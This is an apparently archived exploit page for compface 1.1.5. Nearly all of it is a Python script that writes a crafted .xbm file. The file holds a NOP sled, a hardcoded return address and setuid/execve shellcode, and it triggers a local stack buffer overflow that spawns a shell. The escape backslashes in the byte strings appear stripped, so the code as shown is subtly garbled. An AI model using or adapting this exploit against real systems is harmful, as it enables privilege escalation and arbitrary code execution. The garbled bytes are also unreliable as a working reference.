Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit
# Published : 2009-07-30
# Author : His0k4
# Previous Title : Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit
# Next Title : EPSON Status Monitor 3 Local Privilege Escalation Vulnerability

#!/usr/bin/python
#[*] Exploit     :      	Compface '.xbm' Local Buffer Overflow Exploit
#[*] Affected	 :		compface 1.1.5
#[*] Tested on   :   		Ubuntu 9.04 (without stack randomization)
#[*] Refer	 :		bid/35863
#[*] Exploit     : 		His0k4

#[*] Use : $compface exploit.xbm out

#setuid/execve shellcode for Linux/x86 by Marco Ivaldi
#[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
shellcode=(
"x89xe1xdbxd1xd9x71xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x42x4ax42x37x50x58x50x31x49x4bx48x4dx4dx50x42"
"x4ax44x4bx50x58x4dx49x51x42x42x48x46x4fx46x4f"
"x44x33x45x38x42x48x46x4fx42x42x42x49x42x4ex4b"
"x39x4dx33x51x42x50x53x4cx49x4bx51x48x4dx4dx50"
"x45x5ax41x41")

payload =  "#define noname_width 48rn"
payload += "#define noname_height 48rn"
payload += "staticrn"
payload += "x90"*180
payload += "x80xf4xffxbf" #$esp+10h
payload += "x90"*16
payload += shellcode
payload += "rn"
payload += "char = {rn"

try:
    out_file = open("exploit.xbm","w")
    out_file.write(payload)
    out_file.close()
    print("nExploit file created!n")
except:
    print "Error"

# www.Syue.com [2009-07-30]